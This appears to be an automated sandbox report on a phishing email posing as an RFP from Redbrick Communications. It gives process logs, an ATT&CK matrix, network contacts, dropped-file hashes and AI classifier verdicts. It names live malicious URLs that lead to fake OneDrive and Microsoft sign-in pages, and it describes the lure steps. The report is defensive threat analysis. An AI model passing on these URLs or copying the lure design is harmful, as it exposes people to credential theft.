Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Clipboard Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
Security Account Manager14
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
p4enterprises.com
188.114.97.3
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      unknown
      code.jquery.com
      151.101.130.137
      truefalse
        unknown
        sni1gl.wpc.upsiloncdn.net
        152.199.21.175
        truefalse
          unknown
          challenges.cloudflare.com
          104.18.94.41
          truefalse
            unknown
            bespoke.global-constructions.ca
            188.114.97.3
            truetrue
              unknown
              www.google.com
              142.250.186.68
              truefalse
                unknown
                aadcdn.msauthimages.net
                unknown
                unknownfalse
                  unknown
                  x1.i.lencr.org
                  unknown
                  unknownfalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://bespoke.global-constructions.ca/true
                      unknown
                      https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49true
                        unknown
                        https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64true
                          unknown
                          https://p4enterprises.com/yyhu.htmltrue
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            142.250.186.68
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            144.217.158.133
                            unknownCanada
                            16276OVHFRfalse
                            184.28.88.176
                            unknownUnited States
                            16625AKAMAI-ASUSfalse
                            20.189.173.5
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            104.18.94.41
                            challenges.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            151.101.130.137
                            code.jquery.comUnited States
                            54113FASTLYUSfalse
                            162.159.61.3
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            52.109.32.97
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            2.19.126.160
                            unknownEuropean Union
                            16625AKAMAI-ASUSfalse
                            142.250.186.131
                            unknownUnited States
                            15169GOOGLEUSfalse
                            142.250.186.110
                            unknownUnited States
                            15169GOOGLEUSfalse
                            35.190.80.1
                            a.nel.cloudflare.comUnited States
                            15169GOOGLEUSfalse
                            107.22.247.231
                            unknownUnited States
                            14618AMAZON-AESUSfalse
                            52.113.194.132
                            unknownUnited States
                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            142.250.184.195
                            unknownUnited States
                            15169GOOGLEUSfalse
                            172.217.16.202
                            unknownUnited States
                            15169GOOGLEUSfalse
                            1.1.1.1
                            unknownAustralia
                            13335CLOUDFLARENETUSfalse
                            108.177.15.84
                            unknownUnited States
                            15169GOOGLEUSfalse
                            172.217.16.206
                            unknownUnited States
                            15169GOOGLEUSfalse
                            52.109.68.130
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            104.18.95.41
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            151.101.2.137
                            unknownUnited States
                            54113FASTLYUSfalse
                            142.250.185.170
                            unknownUnited States
                            15169GOOGLEUSfalse
                            142.250.186.106
                            unknownUnited States
                            15169GOOGLEUSfalse
                            2.23.197.184
                            unknownEuropean Union
                            1273CWVodafoneGroupPLCEUfalse
                            88.221.110.91
                            unknownEuropean Union
                            20940AKAMAI-ASN1EUfalse
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            188.114.97.3
                            p4enterprises.comEuropean Union
                            13335CLOUDFLARENETUStrue
                            52.109.28.47
                            unknownUnited States
                            8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                            188.114.96.3
                            unknownEuropean Union
                            13335CLOUDFLARENETUSfalse
                            152.199.21.175
                            sni1gl.wpc.upsiloncdn.netUnited States
                            15133EDGECASTUSfalse
                            IP
                            192.168.2.16
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1538796
                            Start date and time:2024-10-21 19:23:25 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:25
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            Analysis Mode:stream
                            Analysis stop reason:Timeout
                            Sample name:[EXTERNAL] Redbrick Communications Request For Proposal .eml
                            Detection:MAL
                            Classification:mal68.phis.winEML@49/92@27/224
                            Cookbook Comments:
                            • Found application associated with file extension: .eml
                            • Exclude process from analysis (whitelisted): dllhost.exe, SgrmBroker.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 52.109.32.97, 52.113.194.132, 52.109.28.47, 2.19.126.160, 2.19.126.151, 52.109.68.130, 20.189.173.5
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetValueKey calls found.
                            • VT rate limit hit for: [EXTERNAL] Redbrick Communications Request For Proposal .eml
                            InputOutput
                            URL: Model: claude-3-5-sonnet-20240620
                            {
                                "explanation": [
                                    "The email claims to have an attached RFP, but no attachment is mentioned in the JSON data",
                                    "The 'To' field is set to 'Undisclosed recipients:;', which is unusual for a legitimate business communication",
                                    "The email includes a file pass key, which is often used in phishing attempts to add a sense of urgency or importance"
                                ],
                                "phishing": true,
                                "confidence": 8
                            }
                            Is this email content a phishing attempt? Please respond only in valid JSON format:
                                Email content converted to JSON:
                            {
                                "date": "Mon, 21 Oct 2024 16:54:55 +0000", 
                                "subject": "[EXTERNAL] Redbrick Communications Request For Proposal ", 
                                "communications": [
                                    "Some people who received this message don't often get email from montgomery@redbrick.ca. Learn why this is important<https://aka.ms/LearnAboutSenderIdentification>\n\nGood Day,\n\n\nPlease find attached an important RFP(Request For Proposal) from Redbrick Communications  that requires your attention.\n\nFile Pass key: rfp\n\n[RFP ID #19994] Issued: 21st of October 2024\n\nSubmission deadline: 21st of November 2024\n\nThanks,\n\n\n\nAndrea Montgomery, APR, Prosci\n\nVice President, Redbrick Communications\n\nwww.redbrick.ca<http://www.redbrick.ca/>\n\n\n\nMy work day may look different from yours. Please do not feel the need to respond outside of your regular working hours.\n\n\n"
                                ], 
                                "from": "Andrea Montgomery <montgomery@redbrick.ca>", 
                                "to": "Undisclosed recipients:;"
                            }
                            URL: Email Model: claude-3-haiku-20240307
                            ```json
                            {
                              "contains_trigger_text": true,
                              "trigger_text": "Please find attached an important RFP(Request For Proposal) from Redbrick Communications that requires your attention.",
                              "prominent_button_name": "unknown",
                              "text_input_field_labels": [
                                "File Pass key:"
                              ],
                              "pdf_icon_visible": false,
                              "has_visible_captcha": false,
                              "has_urgent_text": true,
                              "has_visible_qrcode": false
                            }
                            URL: PDF document Model: claude-3-haiku-20240307
                            ```json
                            {
                              "contains_trigger_text": true,
                              "trigger_text": "This PDF document has been encrypted by Redbrick Communications.",
                              "prominent_button_name": "View PDF",
                              "text_input_field_labels": "unknown",
                              "pdf_icon_visible": true,
                              "has_visible_captcha": false,
                              "has_urgent_text": false,
                              "has_visible_qrcode": false
                            }
                            URL: PDF document Model: claude-3-haiku-20240307
                            ```json
                            {
                              "brands": [
                                "Microsoft 365"
                              ]
                            }
                            URL: Email Model: claude-3-haiku-20240307
                            ```json
                            {
                              "brands": [
                                "Redbrick Communications"
                              ]
                            }
                            URL: https://p4enterprises.com/yyhu.html Model: claude-3-haiku-20240307
                            ```json
                            {
                              "contains_trigger_text": true,
                              "trigger_text": "Type in 'rfp' to access on Microsoft OneDrive.",
                              "prominent_button_name": "VIEW PDF",
                              "text_input_field_labels": [
                                "Enter 'rfp'"
                              ],
                              "pdf_icon_visible": true,
                              "has_visible_captcha": false,
                              "has_urgent_text": false,
                              "has_visible_qrcode": false
                            }
                            URL: https://p4enterprises.com/yyhu.html Model: claude-3-haiku-20240307
                            ```json
                            {
                              "brands": [
                                "Microsoft OneDrive"
                              ]
                            }
                            URL: https://p4enterprises.com/yyhu.html Model: gpt-4o
                            ```json{  "legit_domain": "onedrive.live.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft OneDrive' is well-known and typically associated with the domain 'onedrive.live.com'.",    "The provided URL 'p4enterprises.com' does not match the legitimate domain for Microsoft OneDrive.",    "The URL 'p4enterprises.com' does not contain any recognizable elements related to Microsoft or OneDrive.",    "The URL appears to be a generic domain name with no clear association to the brand 'Microsoft OneDrive'.",    "The presence of a generic input field labeled 'Enter rfp' does not align with typical Microsoft OneDrive functionality."  ],  "riskscore": 9}
                            Google indexed: True
                            URL: p4enterprises.com
                                        Brands: Microsoft OneDrive
                                        Input Fields: Enter 'rfp'
                            URL: https://bespoke.global-constructions.ca/ Model: claude-3-haiku-20240307
                            ```json
                            {
                              "contains_trigger_text": true,
                              "trigger_text": "Verify you are human",
                              "prominent_button_name": "Verify you are human",
                              "text_input_field_labels": "unknown",
                              "pdf_icon_visible": false,
                              "has_visible_captcha": true,
                              "has_urgent_text": false,
                              "has_visible_qrcode": false
                            }
                            URL: https://bespoke.global-constructions.ca/ Model: claude-3-haiku-20240307
                            ```json
                            {
                              "brands": [
                                "Cloudflare",
                                "Microsoft"
                              ]
                            }
                            URL: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49 Model: claude-3-haiku-20240307
                            ```json
                            {
                              "contains_trigger_text": true,
                              "trigger_text": "Can't access your account?",
                              "prominent_button_name": "Create one!",
                              "text_input_field_labels": [
                                "Email or phone"
                              ],
                              "pdf_icon_visible": false,
                              "has_visible_captcha": false,
                              "has_urgent_text": false,
                              "has_visible_qrcode": false
                            }
                            URL: https://bespoke.global-constructions.ca/&redirect=2f820ca3d02493e0c64659894e20b8d1405b23abmain&uid=f253efe302d32ab264a76e0ce65be76967168e8e60e49 Model: claude-3-haiku-20240307
                            ```json
                            {
                              "brands": []
                            }
                            URL: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64 Model: claude-3-haiku-20240307
                            ```json
                            {
                              "contains_trigger_text": true,
                              "trigger_text": "Enter password",
                              "prominent_button_name": "Sign in",
                              "text_input_field_labels": [
                                "Password"
                              ],
                              "pdf_icon_visible": false,
                              "has_visible_captcha": false,
                              "has_urgent_text": false,
                              "has_visible_qrcode": false
                            }
                            URL: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64 Model: claude-3-haiku-20240307
                            ```json
                            {
                              "brands": [
                                "Microsoft"
                              ]
                            }
                            URL: https://bespoke.global-constructions.ca/&redirect=5b8053b9dea0f7c6b78c93cf3713f2d1sec&uid=f253efe302d32ab264a76e0ce65be76967168ea4b1a64 Model: gpt-4o
                            ```json{  "legit_domain": "microsoft.com",  "classification": "wellknown",  "reasons": [    "The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.",    "The URL 'bespoke.global-constructions.ca' does not match the legitimate domain for Microsoft.",    "The domain 'global-constructions.ca' does not have any known association with Microsoft.",    "The presence of a password input field on a non-Microsoft domain is suspicious.",    "The URL structure with 'bespoke' and 'global-constructions' suggests a potential phishing attempt as it does not align with Microsoft's typical domain structure."  ],  "riskscore": 9}
                            Google indexed: False
                            URL: bespoke.global-constructions.ca
                                        Brands: Microsoft
                                        Input Fields: Password
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):290
                            Entropy (8bit):5.115429046996033
                            Encrypted:false
                            SSDEEP:
                            MD5:A3CA55D67C9F9AE10FB4E7D841F10CC6
                            SHA1:B69C0AA73444128420E9D031426A0B3E4ADE520C
                            SHA-256:134F6D2A1ED61741377BCBDAE30E3EF4AD2BF49530EC6802963AA3146EE9E52E
                            SHA-512:2C2E034439AC542EA1BD1FB988CAFF896B82497AA2E9DBB4CEB61B5E105EC94254AA570D000D4BC8068A927AE112E16BA2E1FAE667E20A09CC25854588F39D63
                            Malicious:false
                            Reputation:unknown
                            Preview:2024/10/21-13:24:11.033 1930 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/10/21-13:24:11.035 1930 Recovering log #3.2024/10/21-13:24:11.035 1930 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):334
                            Entropy (8bit):5.119589786611256
                            Encrypted:false
                            SSDEEP:
                            MD5:5AEA0E5DC547863C974E6ACDEA701560
                            SHA1:C74281E02403743BDF67F76BC1183532A8210DBB
                            SHA-256:16C50F98B586C88EDB1FA5D528596C96746E0EAB968F79A7E39B22608377C90F
                            SHA-512:E7B107AFBFB47B08F602DFCF417F9B15BCFE72337B2DDE8503D4C2751423823679AEE330E33E07C4CCEEF98383FA31278E542193C79A0CC80888915AC02ADD5B
                            Malicious:false
                            Reputation:unknown
                            Preview:2024/10/21-13:24:10.796 16e0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/10/21-13:24:10.800 16e0 Recovering log #3.2024/10/21-13:24:10.801 16e0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):0
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:
                            MD5:AF04D048451672F657C8403936FE6871
                            SHA1:D381F9CFE2CB5DC227C0B121D243674E143B0CE8
                            SHA-256:7CD71D4AE75B83BB8D2EA9CD302B1F091BAB62793064E9622B15294C9EED6482
                            SHA-512:CD8E2684C192959BE22C7824DD3DF84ADCB96A1DFEA0328C351CD11559481D951B3710FAFC179CAAAD8C459A38489EC2364305E4F8B290B9EC57473CEB60E0CD
                            Malicious:false
                            Reputation:unknown
                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13374091457209208","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":134603},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:JSON data
                            Category:dropped
                            Size (bytes):403
                            Entropy (8bit):4.99296113031368
                            Encrypted:false
                            SSDEEP:
                            MD5:AF04D048451672F657C8403936FE6871
                            SHA1:D381F9CFE2CB5DC227C0B121D243674E143B0CE8
                            SHA-256:7CD71D4AE75B83BB8D2EA9CD302B1F091BAB62793064E9622B15294C9EED6482
                            SHA-512:CD8E2684C192959BE22C7824DD3DF84ADCB96A1DFEA0328C351CD11559481D951B3710FAFC179CAAAD8C459A38489EC2364305E4F8B290B9EC57473CEB60E0CD
                            Malicious:false
                            Reputation:unknown
                            Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13374091457209208","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":134603},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):4099
                            Entropy (8bit):5.232278617770468
                            Encrypted:false
                            SSDEEP:
                            MD5:CF262BEAD61AB5A8A5361A6AAAFB2CCE
                            SHA1:6F7D2B926900D3E3BD4384D25550C75A5FD87B6C
                            SHA-256:CC18629942350213D2BD31C8ADFF4EDF9C705DA5EFD20B31877497C93DB7B58F
                            SHA-512:E5441909167924315B6EEFA0F47F715E155B7225EC4EFA8DF4CE65222A9ABAA39933AAD85E97593A7A4C2B953DF60F27FEFC402F9059AFE4E46B698016A9B2A6
                            Malicious:false
                            Reputation:unknown
                            Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:ASCII text
                            Category:dropped
                            Size (bytes):322
                            Entropy (8bit):5.122125256426024
                            Encrypted:false
                            SSDEEP:
                            MD5:504465B7AE2102BDB5A88E47D9A72822
                            SHA1:07E23B46EAE82B022562D233B1DDB1C8B8182C90
                            SHA-256:AA008501127098A25629E1B433230C166F9CBCA67393DACC60D0309E6FBA1587
                            SHA-512:72DE98E22385D1B2A946E4DE506056DAC6CC607F7AE4C02A15F18167065BEAB52592FF3B72BB2B2C1E42F7A9BAA39E59188B698503E366212D4EB64760A3B388
                            Malicious:false
                            Reputation:unknown
                            Preview:2024/10/21-13:24:11.067 16e0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/10/21-13:24:11.068 16e0 Recovering log #3.2024/10/21-13:24:11.070 16e0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                            Category:dropped
                            Size (bytes):71190
                            Entropy (8bit):0.35201261234281306
                            Encrypted:false
                            SSDEEP:
                            MD5:6D0565AF35BCCDD0F37BAA08118163A8
                            SHA1:9911BD096794EB32C8A90F3C74C5031DFA3BD4A1
                            SHA-256:1A6E6E5FD6AB373370777F132FDFE34B037ED3056528993102122A191F2529E6
                            SHA-512:5E2D5B38F03AB71FD8EBF42675F6FE7465AFA826A4D617050884F040187B214B4C1C06CB44065D072D0DF670265C4E7FEB40134DC8BD3B0C1C206D23854DD7A9
                            Malicious:false
                            Reputation:unknown
                            Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 2, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 2
                            Category:dropped
                            Size (bytes):57344
                            Entropy (8bit):3.291927920232006
                            Encrypted:false
                            SSDEEP:
                            MD5:A4D5FECEFE05F21D6F81ACF4D9A788CF
                            SHA1:1A9AC236C80F2A2809F7DE374072E2FCCA5A775C
                            SHA-256:83BE4623D80FFB402FBDEC4125671DF532845A3828A1B378D99BD243A4FD8FF2
                            SHA-512:FF106C6B9E1EA4B1F3E3AB01FAEA21BA24A885E63DDF0C36EB0A8C3C89A9430FE676039C076C50D7C46DC4E809F6A7E35A4BFED64D9033FEBD6121AC547AA5E9
                            Malicious:false
                            Reputation:unknown
                            Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                            File Type:SQLite Rollback Journal
                            Category:dropped
                            Size (bytes):16928
                            Entropy (8bit):1.2160291275063093
                            Encrypted:false
                            SSDEEP:
                            MD5:1CFFE48297DFABA40D16A3C32FE8E076
                            SHA1:6AD825EFDF35618F0EB1C9C66E97213E3052DB2B
                            SHA-256:EA6A10B5BF5DA48C4A79BD52A0C312748089D0B1FEAB54A5DBA0D46C8B05D99F
                            SHA-512:A8B40C942F369128B192020D3C3D5C54092590D5F41A2090B905E28FE94972A160950733949564EBACE85624ED06AA9D2959DFF31A54249D6FA1C181B3310EE1
                            Malicious:false
                            Reputation:unknown
                            Preview:.... .c.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:Certificate, Version=3
                            Category:dropped
                            Size (bytes):1391
                            Entropy (8bit):7.705940075877404
                            Encrypted:false
                            SSDEEP:
                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                            Malicious:false
                            Reputation:unknown
                            Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                            Category:dropped
                            Size (bytes):71954
                            Entropy (8bit):7.996617769952133
                            Encrypted:true
                            SSDEEP:
                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                            Malicious:false
                            Reputation:unknown
